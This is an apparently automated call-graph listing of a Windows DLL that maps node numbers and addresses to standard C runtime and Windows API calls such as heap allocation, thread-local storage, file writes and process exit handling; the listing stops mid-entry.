__dosmaperr 5873->5878 5874 235f570e 5902 235f6368 5874->5902 5876 235f56f9 RtlAllocateHeap 5877 235f570c 5876->5877 5876->5878 5877->5852 5878->5874 5878->5876 5879 235f474f __dosmaperr 7 API calls 5878->5879 5879->5878 5882 235f35f2 RaiseException 5880->5882 5882->5855 5884 235f479f ___DestructExceptionObject 5883->5884 5896 235f5671 RtlEnterCriticalSection 5884->5896 5886 235f47aa 5897 235f47dc 5886->5897 5888 235f47d1 _abort 5888->5872 5890 235f2ae5 IsProcessorFeaturePresent 5889->5890 5891 235f2ae3 5889->5891 5893 235f2b58 5890->5893 5891->5871 5901 235f2b1c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 5893->5901 5895 235f2c3b 5895->5871 5896->5886 5900 235f56b9 RtlLeaveCriticalSection 5897->5900 5899 235f47e3 5899->5888 5900->5899 5901->5895 5905 235f5b7a GetLastError 5902->5905 5906 235f5b99 5905->5906 5907 235f5b93 5905->5907 5912 235f5bf0 SetLastError 5906->5912 5931 235f637b 5906->5931 5924 235f5e08 5907->5924 5911 235f5bb3 5938 235f571e 5911->5938 5914 235f5bf9 5912->5914 5914->5877 5917 235f5bb9 5919 235f5be7 SetLastError 5917->5919 5918 235f5bcf 5951 235f593c 5918->5951 5919->5914 5922 235f571e _free 17 API calls 5923 235f5be0 5922->5923 5923->5912 5923->5919 5956 235f5c45 5924->5956 5926 235f5e2f 5927 235f5e47 TlsGetValue 5926->5927 5930 235f5e3b 5926->5930 5927->5930 5928 235f2ada _ValidateLocalCookies 5 API calls 5929 235f5e58 5928->5929 5929->5906 5930->5928 5932 235f6388 __dosmaperr 5931->5932 5933 235f63c8 5932->5933 5934 235f63b3 RtlAllocateHeap 5932->5934 5937 235f474f __dosmaperr 7 API calls 5932->5937 5936 235f6368 _free 19 API calls 5933->5936 5934->5932 5935 235f5bab 5934->5935 5935->5911 5944 235f5e5e 5935->5944 5936->5935 5937->5932 5939 235f5729 HeapFree 5938->5939 5940 235f5752 _free 5938->5940 5939->5940 5941 235f573e 5939->5941 5940->5917 5942 235f6368 _free 18 API calls 5941->5942 5943 235f5744 GetLastError 5942->5943 5943->5940 5945 235f5c45 __dosmaperr 5 API calls 5944->5945 5946 235f5e85 5945->5946 5947 235f5ea0 TlsSetValue 5946->5947 5948 235f5e94 5946->5948 5947->5948 5949 235f2ada _ValidateLocalCookies 5 API calls 5948->5949 5950 235f5bc8 5949->5950 5950->5911 5950->5918 5962 235f5914 5951->5962 5957 235f5c71 5956->5957 5958 235f5c75 __crt_fast_encode_pointer 5956->5958 5957->5958 5959 235f5c95 5957->5959 5960 235f5ce1 __dosmaperr LoadLibraryExW GetLastError LoadLibraryExW FreeLibrary 5957->5960 5958->5926 5959->5958 5961 235f5ca1 GetProcAddress 5959->5961 5960->5957 5961->5958 5963 235f5854 __dosmaperr RtlEnterCriticalSection RtlLeaveCriticalSection 5962->5963 5964 235f5938 5963->5964 5965 235f58c4 5964->5965 5966 235f5758 __dosmaperr 20 API calls 5965->5966 5967 235f58e8 5966->5967 5967->5922 5969 235f1ca6 _strlen 5968->5969 5969->5864 7155 235f20db 7156 235f20e7 ___DestructExceptionObject 7155->7156 7157 235f2110 dllmain_raw 7156->7157 7162 235f210b 7156->7162 7166 235f20f6 7156->7166 7158 235f212a 7157->7158 7157->7166 7168 235f1eec 7158->7168 7160 235f2177 7161 235f1eec 31 API calls 7160->7161 7160->7166 7163 235f218a 7161->7163 7162->7160 7165 235f1eec 31 API calls 7162->7165 7162->7166 7164 235f2193 dllmain_raw 7163->7164 7163->7166 7164->7166 7167 235f216d dllmain_raw 7165->7167 7167->7160 7169 235f1f2a dllmain_crt_process_detach 7168->7169 7170 235f1ef7 7168->7170 7177 235f1f06 7169->7177 7171 235f1f1c dllmain_crt_process_attach 7170->7171 7172 235f1efc 7170->7172 7171->7177 7173 235f1f12 7172->7173 7174 235f1f01 7172->7174 7183 235f23ec 7173->7183 7174->7177 7178 235f240b 7174->7178 7177->7162 7191 235f53e5 7178->7191 7312 235f3513 7183->7312 7186 235f23f5 7186->7177 7189 235f2408 7189->7177 7190 235f351e 7 API calls 7190->7186 7197 235f5aca 7191->7197 7194 235f351e 7301 235f3820 7194->7301 7196 235f2415 7196->7177 7198 235f2410 7197->7198 7199 235f5ad4 7197->7199 7198->7194 7200 235f5e08 __dosmaperr 11 API calls 7199->7200 7201 235f5adb 7200->7201 7201->7198 7202 235f5e5e __dosmaperr 11 API calls 7201->7202 7203 235f5aee 7202->7203 7205 235f59b5 7203->7205 7206 235f59c0 7205->7206 7210 235f59d0 7205->7210 7211 235f59d6 7206->7211 7209 235f571e _free 20 API calls 7209->7210 7210->7198 7212 235f59e9 7211->7212 7213 235f59ef 7211->7213 7214 235f571e _free 20 API calls 7212->7214 7215 235f571e _free 20 API calls 7213->7215 7214->7213 7216 235f59fb 7215->7216 7217 235f571e _free 20 API calls 7216->7217 7218 235f5a06 7217->7218 7219 235f571e _free 20 API calls 7218->7219 7220 235f5a11 7219->7220 7221 235f571e _free 20 API calls 7220->7221 7222 235f5a1c 7221->7222 7223 235f571e _free 20 API calls 7222->7223 7224 235f5a27 7223->7224 7225 235f571e _free 20 API calls 7224->7225 7226 235f5a32 7225->7226 7227 235f571e _free 20 API calls 7226->7227 7228 235f5a3d 7227->7228 7229 235f571e _free 20 API calls 7228->7229 7230 235f5a48 7229->7230 7231 235f571e _free 20 API calls 7230->7231 7232 235f5a56 7231->7232 7237 235f589c 7232->7237 7243 235f57a8 7237->7243 7239 235f58c0 7240 235f58ec 7239->7240 7256 235f5809 7240->7256 7242 235f5910 7242->7209 7244 235f57b4 ___DestructExceptionObject 7243->7244 7251 235f5671 RtlEnterCriticalSection 7244->7251 7246 235f57be 7249 235f571e _free 20 API calls 7246->7249 7250 235f57e8 7246->7250 7248 235f57f5 _abort 7248->7239 7249->7250 7252 235f57fd 7250->7252 7251->7246 7255 235f56b9 RtlLeaveCriticalSection 7252->7255 7254 235f5807 7254->7248 7255->7254 7257 235f5815 ___DestructExceptionObject 7256->7257 7264 235f5671 RtlEnterCriticalSection 7257->7264 7259 235f581f 7265 235f5a7f 7259->7265 7261 235f5832 7269 235f5848 7261->7269 7263 235f5840 _abort 7263->7242 7264->7259 7266 235f5a8e __fassign 7265->7266 7268 235f5ab5 __fassign 7265->7268 7266->7268 7272 235f7cc2 7266->7272 7268->7261 7300 235f56b9 RtlLeaveCriticalSection 7269->7300 7271 235f5852 7271->7263 7273 235f7d42 7272->7273 7276 235f7cd8 7272->7276 7274 235f7d90 7273->7274 7277 235f571e _free 20 API calls 7273->7277 7275 235f7e35 __fassign 20 API calls 7274->7275 7290 235f7d9e 7275->7290 7276->7273 7278 235f7d0b 7276->7278 7284 235f571e _free 20 API calls 7276->7284 7279 235f7d64 7277->7279 7280 235f7d2d 7278->7280 7285 235f571e _free 20 API calls 7278->7285 7281 235f571e _free 20 API calls 7279->7281 7283 235f571e _free 20 API calls 7280->7283 7282 235f7d77 7281->7282 7286 235f571e _free 20 API calls 7282->7286 7287 235f7d37 7283->7287 7289 235f7d00 7284->7289 7291 235f7d22 7285->7291 7292 235f7d85 7286->7292 7293 235f571e _free 20 API calls 7287->7293 7288 235f7dfe 7294 235f571e _free 20 API calls 7288->7294 7295 235f90ba ___free_lconv_mon 20 API calls 7289->7295 7290->7288 7296 235f571e 20 API calls _free 7290->7296 7297 235f91b8 __fassign 20 API calls 7291->7297 7298 235f571e _free 20 API calls 7292->7298 7293->7273 7299 235f7e04 7294->7299 7295->7278 7296->7290 7297->7280 7298->7274 7299->7268 7300->7271 7302 235f382d 7301->7302 7306 235f384b ___vcrt_freefls@4 7301->7306 7303 235f383b 7302->7303 7307 235f3b67 7302->7307 7305 235f3ba2 ___vcrt_FlsSetValue 6 API calls 7303->7305 7305->7306 7306->7196 7308 235f3a82 try_get_function 5 API calls 7307->7308 7309 235f3b81 7308->7309 7310 235f3b8d 7309->7310 7311 235f3b99 TlsGetValue 7309->7311 7310->7303 7311->7310 7318 235f3856 7312->7318 7314 235f23f1 7314->7186 7315 235f53da 7314->7315 7316 235f5b7a __dosmaperr 20 API calls 7315->7316 7317 235f23fd 7316->7317 7317->7189 7317->7190 7319 235f385f 7318->7319 7320 235f3862 GetLastError 7318->7320 7319->7314 7321 235f3b67 ___vcrt_FlsGetValue 6 API calls 7320->7321 7322 235f3877 7321->7322 7323 235f38dc SetLastError 7322->7323 7324 235f3ba2 ___vcrt_FlsSetValue 6 API calls 7322->7324 7329 235f3896 7322->7329 7323->7314 7325 235f3890 7324->7325 7326 235f38b8 7325->7326 7327 235f3ba2 ___vcrt_FlsSetValue 6 API calls 7325->7327 7325->7329 7328 235f3ba2 ___vcrt_FlsSetValue 6 API calls 7326->7328 7326->7329 7327->7326 7328->7329 7329->7323 7513 235f4a9a 7516 235f5411 7513->7516 7517 235f541d _abort 7516->7517 7518 235f5af6 _abort 38 API calls 7517->7518 7521 235f5422 7518->7521 7519 235f55a8 _abort 38 API calls 7520 235f544c 7519->7520 7521->7519 6789 235f2418 6790 235f2420 ___scrt_release_startup_lock 6789->6790 6793 235f47f5 6790->6793 6792 235f2448 6794 235f4808 6793->6794 6795 235f4804 6793->6795 6798 235f4815 6794->6798 6795->6792 6799 235f5b7a __dosmaperr 20 API calls 6798->6799 6802 235f482c 6799->6802 6800 235f2ada _ValidateLocalCookies 5 API calls 6801 235f4811 6800->6801 6801->6792 6802->6800 7330 235f4ed7 7331 235f6d60 51 API calls 7330->7331 7332 235f4ee9 7331->7332 7341 235f7153 GetEnvironmentStringsW 7332->7341 7335 235f4ef4 7337 235f571e _free 20 API calls 7335->7337 7338 235f4f29 7337->7338 7339 235f4eff 7340 235f571e _free 20 API calls 7339->7340 7340->7335 7342 235f716a 7341->7342 7352 235f71bd 7341->7352 7345 235f7170 WideCharToMultiByte 7342->7345 7343 235f4eee 7343->7335 7353 235f4f2f 7343->7353 7344 235f71c6 FreeEnvironmentStringsW 7344->7343 7346 235f718c 7345->7346 7345->7352 7347 235f56d0 21 API calls 7346->7347 7348 235f7192 7347->7348 7349 235f7199 WideCharToMultiByte 7348->7349 7350 235f71af 7348->7350 7349->7350 7351 235f571e _free 20 API calls 7350->7351 7351->7352 7352->7343 7352->7344 7354 235f4f44 7353->7354 7355 235f637b __dosmaperr 20 API calls 7354->7355 7365 235f4f6b 7355->7365 7356 235f4fcf 7357 235f571e _free 20 API calls 7356->7357 7358 235f4fe9 7357->7358 7358->7339 7359 235f637b __dosmaperr 20 API calls 7359->7365 7360 235f4fd1 7361 235f5000 20 API calls 7360->7361 7363 235f4fd7 7361->7363 7362 235f544d ___std_exception_copy 26 API calls 7362->7365 7366 235f571e _free 20 API calls 7363->7366 7364 235f4ff3 7367 235f62bc _abort 11 API calls 7364->7367 7365->7356 7365->7359 7365->7360 7365->7362 7365->7364 7368 235f571e _free 20 API calls 7365->7368 7366->7356 7369 235f4fff 7367->7369 7368->7365 7370 235f73d5 7371 235f73e1 ___DestructExceptionObject 7370->7371 7382 235f5671 RtlEnterCriticalSection 7371->7382 7373 235f73e8 7383 235f8be3 7373->7383 7375 235f73f7 7376 235f7406 7375->7376 7396 235f7269 GetStartupInfoW 7375->7396 7407 235f7422 7376->7407 7380 235f7417 _abort 7382->7373 7384 235f8bef ___DestructExceptionObject 7383->7384 7385 235f8bfc 7384->7385 7386 235f8c13 7384->7386 7387 235f6368 _free 20 API calls 7385->7387 7410 235f5671 RtlEnterCriticalSection 7386->7410 7389 235f8c01 7387->7389 7390 235f62ac _abort 26 API calls 7389->7390 7391 235f8c0b _abort 7390->7391 7391->7375 7392 235f8c1f 7395 235f8c4b 7392->7395 7411 235f8b34 7392->7411 7418 235f8c72 7395->7418 7397 235f7318 7396->7397 7398 235f7286 7396->7398 7402 235f731f 7397->7402 7398->7397 7399 235f8be3 27 API calls 7398->7399 7400 235f72af 7399->7400 7400->7397 7401 235f72dd GetFileType 7400->7401 7401->7400 7403 235f7326 7402->7403 7404 235f7369 GetStdHandle 7403->7404 7405 235f73d1 7403->7405 7406 235f737c GetFileType 7403->7406 7404->7403 7405->7376 7406->7403 7422 235f56b9 RtlLeaveCriticalSection 7407->7422 7409 235f7429 7409->7380 7410->7392 7412 235f637b __dosmaperr 20 API calls 7411->7412 7413 235f8b46 7412->7413 7416 235f5eb7 11 API calls 7413->7416 7417 235f8b53 7413->7417 7414 235f571e _free 20 API calls 7415 235f8ba5 7414->7415 7415->7392 7416->7413 7417->7414 7421 235f56b9 RtlLeaveCriticalSection 7418->7421 7420 235f8c79 7420->7391 7421->7420 7422->7409 5970 235f5351 5971 235f5360 5970->5971 5975 235f5374 5970->5975 5973 235f571e _free 20 API calls 5971->5973 5971->5975 5972 235f571e _free 20 API calls 5974 235f5386 5972->5974 5973->5975 5976 235f571e _free 20 API calls 5974->5976 5975->5972 5977 235f5399 5976->5977 5978 235f571e _free 20 API calls 5977->5978 5979 235f53aa 5978->5979 5980 235f571e _free 20 API calls 5979->5980 5981 235f53bb 5980->5981 7423 235f36d0 7424 235f36e2 7423->7424 7426 235f36f0 @_EH4_CallFilterFunc@8 7423->7426 7425 235f2ada _ValidateLocalCookies 5 API calls 7424->7425 7425->7426 7522 235f3c90 RtlUnwind 5982 235f284f 5985 235f2882 5982->5985 5988 235f3550 5985->5988 5987 235f285d 5989 235f358a 5988->5989 5990 235f355d 5988->5990 5989->5987 5990->5989 5991 235f47e5 ___std_exception_copy 21 API calls 5990->5991 5992 235f357a 5991->5992 5992->5989 5994 235f544d 5992->5994 5995 235f5468 5994->5995 5996 235f545a 5994->5996 5997 235f6368 _free 20 API calls 5995->5997 5996->5995 6001 235f547f 5996->6001 5998 235f5470 5997->5998 6003 235f62ac 5998->6003 6000 235f547a 6000->5989 6001->6000 6002 235f6368 _free 20 API calls 6001->6002 6002->5998 6006 235f6231 6003->6006 6005 235f62b8 6005->6000 6007 235f5b7a __dosmaperr 20 API calls 6006->6007 6008 235f6247 6007->6008 6009 235f62a6 6008->6009 6012 235f6255 6008->6012 6017 235f62bc IsProcessorFeaturePresent 6009->6017 6011 235f62ab 6013 235f6231 _abort 26 API calls 6011->6013 6015 235f2ada _ValidateLocalCookies 5 API calls 6012->6015 6014 235f62b8 6013->6014 6014->6005 6016 235f627c 6015->6016 6016->6005 6018 235f62c7 6017->6018 6021 235f60e2 6018->6021 6022 235f60fe ___scrt_fastfail 6021->6022 6023 235f612a IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 6022->6023 6026 235f61fb ___scrt_fastfail 6023->6026 6024 235f2ada _ValidateLocalCookies 5 API calls 6025 235f6219 GetCurrentProcess TerminateProcess 6024->6025 6025->6011 6026->6024 6027 235f724e GetProcessHeap 6803 235f220c 6804 235f221a dllmain_dispatch 6803->6804 6805 235f2215 6803->6805 6807 235f22b1 6805->6807 6808 235f22c7 6807->6808 6810 235f22d0 6808->6810 6811 235f2264 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 6808->6811 6810->6804 6811->6810 7523 235f508a 7524 235f509c 7523->7524 7525 235f50a2 7523->7525 7526 235f5000 20 API calls 7524->7526 7526->7525 6028 235f2049 6029 235f2055 ___DestructExceptionObject 6028->6029 6030 235f207d 6029->6030 6031 235f20d3 6029->6031 6041 235f205e 6029->6041 6042 235f244c 6030->6042 6063 235f2639 IsProcessorFeaturePresent 6031->6063 6034 235f20da 6035 235f2082 6051 235f2308 6035->6051 6037 235f2087 __RTC_Initialize 6054 235f20c4 6037->6054 6039 235f209f 6057 235f260b 6039->6057 6043 235f2451 ___scrt_release_startup_lock 6042->6043 6044 235f2455 6043->6044 6048 235f2461 6043->6048 6067 235f527a 6044->6067 6047 235f246e 6047->6035 6048->6047 6070 235f499b 6048->6070 6149 235f34c7 RtlInterlockedFlushSList 6051->6149 6053 235f2312 6053->6037 6151 235f246f 6054->6151 6056 235f20c9 ___scrt_release_startup_lock 6056->6039 6058 235f2617 6057->6058 6060 235f262d 6058->6060 6192 235f53ed 6058->6192 6060->6041 6064 235f264e ___scrt_fastfail 6063->6064 6065 235f26f9 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 6064->6065 6066 235f2744 ___scrt_fastfail 6065->6066 6066->6034 6092 235f5132 6067->6092 6071 235f49a7 _abort 6070->6071 6072 235f49bf 6071->6072 6114 235f4af5 GetModuleHandleW 6071->6114 6123 235f5671 RtlEnterCriticalSection 6072->6123 6079 235f4a3c 6089 235f4a54 6079->6089 6124 235f4669 6079->6124 6080 235f4aae 6139 235fbdc9 6080->6139 6081 235f4a82 6131 235f4ab4 6081->6131 6082 235f49c7 6082->6079 6084 235f527a _abort 20 API calls 6082->6084 6090 235f4a65 6082->6090 6084->6079 6087 235f4669 _abort 5 API calls 6087->6090 6089->6087 6128 235f4aa5 6090->6128 6095 235f50e1 6092->6095 6094 235f245f 6094->6035 6096 235f50ed ___DestructExceptionObject 6095->6096 6103 235f5671 RtlEnterCriticalSection 6096->6103 6098 235f50fb 6104 235f515a 6098->6104 6102 235f5119 _abort 6102->6094 6103->6098 6107 235f5182 6104->6107 6109 235f517a 6104->6109 6105 235f2ada _ValidateLocalCookies 5 API calls 6106 235f5108 6105->6106 6110 235f5126 6106->6110 6108 235f571e _free 20 API calls 6107->6108 6107->6109 6108->6109 6109->6105 6113 235f56b9 RtlLeaveCriticalSection 6110->6113 6112 235f5130 6112->6102 6113->6112 6115 235f49b3 6114->6115 6115->6072 6116 235f4b39 GetModuleHandleExW 6115->6116 6117 235f4b63 GetProcAddress 6116->6117 6120 235f4b78 6116->6120 6117->6120 6118 235f4b8c FreeLibrary 6119 235f4b95 6118->6119 6121 235f2ada _ValidateLocalCookies 5 API calls 6119->6121 6120->6118 6120->6119 6122 235f4b9f 6121->6122 6122->6072 6123->6082 6125 235f4698 6124->6125 6126 235f2ada _ValidateLocalCookies 5 API calls 6125->6126 6127 235f46c1 6126->6127 6127->6089 6142 235f56b9 RtlLeaveCriticalSection 6128->6142 6130 235f4a7e 6130->6080 6130->6081 6143 235f6025 6131->6143 6134 235f4ae2 6137 235f4b39 _abort 8 API calls 6134->6137 6135 235f4ac2 GetPEB 6135->6134 6136 235f4ad2 GetCurrentProcess TerminateProcess 6135->6136 6136->6134 6138 235f4aea ExitProcess 6137->6138 6140 235f2ada _ValidateLocalCookies 5 API calls 6139->6140 6141 235fbdd4 6140->6141 6141->6141 6142->6130 6144 235f604a 6143->6144 6148 235f6040 6143->6148 6145 235f5c45 __dosmaperr 5 API calls 6144->6145 6145->6148 6146 235f2ada _ValidateLocalCookies 5 API calls 6147 235f4abe 6146->6147 6147->6134 6147->6135 6148->6146 6150 235f34d7 6149->6150 6150->6053 6156 235f53ff 6151->6156 6163 235f5c2b 6156->6163 6159 235f391b 6160 235f3925 6159->6160 6162 235f354d 6159->6162 6174 235f3b2c 6160->6174 6162->6056 6164 235f5c35 6163->6164 6165 235f2476 6163->6165 6167 235f5db2 6164->6167 6165->6159 6168 235f5c45 __dosmaperr 5 API calls 6167->6168 6169 235f5dd9 6168->6169 6170 235f5df1 TlsFree 6169->6170 6171 235f5de5 6169->6171 6170->6171 6172 235f2ada _ValidateLocalCookies 5 API calls 6171->6172 6173 235f5e02 6172->6173 6173->6165 6179 235f3a82 6174->6179 6176 235f3b46 6177 235f3b5e TlsFree 6176->6177 6178 235f3b52 6176->6178 6177->6178 6178->6162 6180 235f3aaa 6179->6180 6184 235f3aa6 __crt_fast_encode_pointer 6179->6184 6180->6184 6185 235f39be 6180->6185 6183 235f3ac4 GetProcAddress 6183->6184 6184->6176 6190 235f39cd try_get_first_available_module 6185->6190 6186 235f3a77 6186->6183 6186->6184 6187 235f39ea LoadLibraryExW 6188 235f3a05 GetLastError 6187->6188 6187->6190 6188->6190 6189 235f3a60 FreeLibrary 6189->6190 6190->6186 6190->6187 6190->6189 6191 235f3a38 LoadLibraryExW 6190->6191 6191->6190 6203 235f74da 6192->6203 6195 235f3529 6196 235f3543 6195->6196 6197 235f3532 6195->6197 6196->6060 6198 235f391b ___vcrt_uninitialize_ptd 6 API calls 6197->6198 6199 235f3537 6198->6199 6207 235f3972 6199->6207 6204 235f74f3 6203->6204 6205 235f2ada _ValidateLocalCookies 5 API calls 6204->6205 6206 235f2625 6205->6206 6206->6195 6208 235f353c 6207->6208 6209 235f397d 6207->6209 6211 235f3c50 6208->6211 6210 235f3987 RtlDeleteCriticalSection 6209->6210 6210->6208 6210->6210 6212 235f3c7f 6211->6212 6214 235f3c59 6211->6214 6212->6196 6213 235f3c69 FreeLibrary 6213->6214 6214->6212 6214->6213 7527 235f8a89 7528 235f6d60 51 API calls 7527->7528 7529 235f8a8e 7528->7529 6215 235f5348 6216 235f3529 ___vcrt_uninitialize 8 API calls 6215->6216 6217 235f534f 6216->6217 6218 235f7b48 6228 235f8ebf 6218->6228 6222 235f7b55 6241 235f907c 6222->6241 6225 235f7b7f 6226 235f571e _free 20 API calls 6225->6226 6227 235f7b8a 6226->6227 6245 235f8ec8 6228->6245 6230 235f7b50 6231 235f8fdc 6230->6231 6232 235f8fe8 ___DestructExceptionObject 6231->6232 6265 235f5671 RtlEnterCriticalSection 6232->6265 6234 235f905e 6279 235f9073 6234->6279 6236 235f906a _abort 6236->6222 6237 235f9032 RtlDeleteCriticalSection 6238 235f571e _free 20 API calls 6237->6238 6240 235f8ff3 6238->6240 6240->6234 6240->6237 6266 235fa09c 6240->6266 6242 235f7b64 RtlDeleteCriticalSection 6241->6242 6243 235f9092 6241->6243 6242->6222 6242->6225 6243->6242 6244 235f571e _free 20 API calls 6243->6244 6244->6242 6246 235f8ed4 ___DestructExceptionObject 6245->6246 6255 235f5671 RtlEnterCriticalSection 6246->6255 6248 235f8f77 6260 235f8f97 6248->6260 6249 235f8ee3 6249->6248 6254 235f8e78 66 API calls 6249->6254 6256 235f7b94 RtlEnterCriticalSection 6249->6256 6257 235f8f6d 6249->6257 6252 235f8f83 _abort 6252->6230 6254->6249 6255->6249 6256->6249 6263 235f7ba8 RtlLeaveCriticalSection 6257->6263 6259 235f8f75 6259->6249 6264 235f56b9 RtlLeaveCriticalSection 6260->6264 6262 235f8f9e 6262->6252 6263->6259 6264->6262 6265->6240 6267 235fa0a8 ___DestructExceptionObject 6266->6267 6268 235fa0ce 6267->6268 6269 235fa0b9 6267->6269 6278 235fa0c9 _abort 6268->6278 6282 235f7b94 RtlEnterCriticalSection 6268->6282 6270 235f6368 _free 20 API calls 6269->6270 6272 235fa0be 6270->6272 6274 235f62ac _abort 26 API calls 6272->6274 6273 235fa0ea 6283 235fa026 6273->6283 6274->6278 6276 235fa0f5 6299 235fa112 6276->6299 6278->6240 6627 235f56b9 RtlLeaveCriticalSection 6279->6627 6281 235f907a 6281->6236 6282->6273 6284 235fa048 6283->6284 6285 235fa033 6283->6285 6297 235fa043 6284->6297 6302 235f8e12 6284->6302 6286 235f6368 _free 20 API calls 6285->6286 6287 235fa038 6286->6287 6289 235f62ac _abort 26 API calls 6287->6289 6289->6297 6291 235f907c 20 API calls 6292 235fa064 6291->6292 6308 235f7a5a 6292->6308 6294 235fa06a 6315 235fadce 6294->6315 6297->6276 6298 235f571e _free 20 API calls 6298->6297 6626 235f7ba8 RtlLeaveCriticalSection 6299->6626 6301 235fa11a 6301->6278 6303 235f8e2a 6302->6303 6304 235f8e26 6302->6304 6303->6304 6305 235f7a5a 26 API calls 6303->6305 6304->6291 6306 235f8e4a 6305->6306 6330 235f9a22 6306->6330 6309 235f7a7b 6308->6309 6310 235f7a66 6308->6310 6309->6294 6311 235f6368 _free 20 API calls 6310->6311 6312 235f7a6b 6311->6312 6313 235f62ac _abort 26 API calls 6312->6313 6314 235f7a76 6313->6314 6314->6294 6316 235faddd 6315->6316 6317 235fadf2 6315->6317 6318 235f6355 __dosmaperr 20 API calls 6316->6318 6319 235fae2d 6317->6319 6323 235fae19 6317->6323 6320 235fade2 6318->6320 6321 235f6355 __dosmaperr 20 API calls 6319->6321 6322 235f6368 _free 20 API calls 6320->6322 6324 235fae32 6321->6324 6327 235fa070 6322->6327 6583 235fada6 6323->6583 6326 235f6368 _free 20 API calls 6324->6326 6328 235fae3a 6326->6328 6327->6297 6327->6298 6329 235f62ac _abort 26 API calls 6328->6329 6329->6327 6331 235f9a2e ___DestructExceptionObject 6330->6331 6332 235f9a4e 6331->6332 6333 235f9a36 6331->6333 6335 235f9aec 6332->6335 6340 235f9a83 6332->6340 6355 235f6355 6333->6355 6337 235f6355 __dosmaperr 20 API calls 6335->6337 6339 235f9af1 6337->6339 6338 235f6368 _free 20 API calls 6349 235f9a43 _abort 6338->6349 6341 235f6368 _free 20 API calls 6339->6341 6358 235f8c7b RtlEnterCriticalSection 6340->6358 6343 235f9af9 6341->6343 6345 235f62ac _abort 26 API calls 6343->6345 6344 235f9a89 6346 235f9aba 6344->6346 6347 235f9aa5 6344->6347 6345->6349 6359 235f9b0d 6346->6359 6348 235f6368 _free 20 API calls 6347->6348 6351 235f9aaa 6348->6351 6349->6304 6353 235f6355 __dosmaperr 20 API calls 6351->6353 6352 235f9ab5 6410 235f9ae4 6352->6410 6353->6352 6356 235f5b7a __dosmaperr 20 API calls 6355->6356 6357 235f635a 6356->6357 6357->6338 6358->6344 6360 235f9b3b 6359->6360 6397 235f9b34 6359->6397 6361 235f9b3f 6360->6361 6362 235f9b5e 6360->6362 6363 235f6355 __dosmaperr 20 API calls 6361->6363 6366 235f9baf 6362->6366 6367 235f9b92 6362->6367 6365 235f9b44 6363->6365 6364 235f2ada _ValidateLocalCookies 5 API calls 6368 235f9d15 6364->6368 6369 235f6368 _free 20 API calls 6365->6369 6370 235f9bc5 6366->6370 6413 235fa00b 6366->6413 6371 235f6355 __dosmaperr 20 API calls 6367->6371 6368->6352 6372 235f9b4b 6369->6372 6416 235f96b2 6370->6416 6375 235f9b97 6371->6375 6376 235f62ac _abort 26 API calls 6372->6376 6378 235f6368 _free 20 API calls 6375->6378 6376->6397 6381 235f9b9f 6378->6381 6379 235f9c0c 6383 235f9c66 WriteFile 6379->6383 6384 235f9c20 6379->6384 6380 235f9bd3 6385 235f9bf9 6380->6385 6386 235f9bd7 6380->6386 6382 235f62ac _abort 26 API calls 6381->6382 6382->6397 6387 235f9c89 GetLastError 6383->6387 6392 235f9bef 6383->6392 6389 235f9c28 6384->6389 6390 235f9c56 6384->6390 6428 235f9492 GetConsoleCP 6385->6428 6391 235f9ccd 6386->6391 6423 235f9645 6386->6423 6387->6392 6393 235f9c2d 6389->6393 6394 235f9c46 6389->6394 6454 235f9728 6390->6454 6391->6397 6398 235f6368 _free 20 API calls 6391->6398 6392->6391 6392->6397 6401 235f9ca9 6392->6401 6393->6391 6439 235f9807 6393->6439 6446 235f98f5 6394->6446 6397->6364 6400 235f9cf2 6398->6400 6403 235f6355 __dosmaperr 20 API calls 6400->6403 6404 235f9cc4 6401->6404 6405 235f9cb0 6401->6405 6403->6397 6461 235f6332 6404->6461 6406 235f6368 _free 20 API calls 6405->6406 6408 235f9cb5 6406->6408 6409 235f6355 __dosmaperr 20 API calls 6408->6409 6409->6397 6582 235f8c9e RtlLeaveCriticalSection 6410->6582 6412 235f9aea 6412->6349 6466 235f9f8d 6413->6466 6488 235f8dbc 6416->6488 6418 235f96c2 6419 235f96c7 6418->6419 6497 235f5af6 GetLastError 6418->6497 6419->6379 6419->6380 6421 235f96ea 6421->6419 6422 235f9708 GetConsoleMode 6421->6422 6422->6419 6426 235f969f 6423->6426 6427 235f966a 6423->6427 6424 235fa181 WriteConsoleW CreateFileW 6424->6427 6425 235f96a1 GetLastError 6425->6426 6426->6392 6427->6424 6427->6425 6427->6426 6429 235f94f5 6428->6429 6435 235f9607 6428->6435 6433 235f79e6 40 API calls __fassign 6429->6433 6434 235f957b WideCharToMultiByte 6429->6434 6429->6435 6438 235f95d2 WriteFile 6429->6438 6561 235f7c19 6429->6561 6430 235f2ada _ValidateLocalCookies 5 API calls 6432 235f9641 6430->6432 6432->6392 6433->6429 6434->6435 6436 235f95a1 WriteFile 6434->6436 6435->6430 6436->6429 6437 235f962a GetLastError 6436->6437 6437->6435 6438->6429 6438->6437 6444 235f9816 6439->6444 6440 235f98d8 6441 235f2ada _ValidateLocalCookies 5 API calls 6440->6441 6443 235f98f1 6441->6443 6442 235f9894 WriteFile 6442->6444 6445 235f98da GetLastError 6442->6445 6443->6392 6444->6440 6444->6442 6445->6440 6449 235f9904 6446->6449 6447 235f9a0f 6448 235f2ada _ValidateLocalCookies 5 API calls 6447->6448 6450 235f9a1e 6448->6450 6449->6447 6451 235f9986 WideCharToMultiByte 6449->6451 6452 235f99bb WriteFile 6449->6452 6450->6392 6451->6452 6453 235f9a07 GetLastError 6451->6453 6452->6449 6452->6453 6453->6447 6458 235f9737 6454->6458 6455 235f97ea 6457 235f2ada _ValidateLocalCookies 5 API calls 6455->6457 6456 235f97a9 WriteFile 6456->6458 6459 235f97ec GetLastError 6456->6459 6460 235f9803 6457->6460 6458->6455 6458->6456 6459->6455 6460->6392 6462 235f6355 __dosmaperr 20 API calls 6461->6462 6463 235f633d _free 6462->6463 6464 235f6368 _free 20 API calls 6463->6464 6465 235f6350 6464->6465 6465->6397 6475 235f8d52 6466->6475 6468 235f9f9f 6469 235f9fb8 SetFilePointerEx 6468->6469 6470 235f9fa7 6468->6470 6472 235f9fac 6469->6472 6473 235f9fd0 GetLastError 6469->6473 6471 235f6368 _free 20 API calls 6470->6471 6471->6472 6472->6370 6474 235f6332 __dosmaperr 20 API calls 6473->6474 6474->6472 6476 235f8d5f 6475->6476 6477 235f8d74 6475->6477 6478 235f6355 __dosmaperr 20 API calls 6476->6478 6479 235f6355 __dosmaperr 20 API 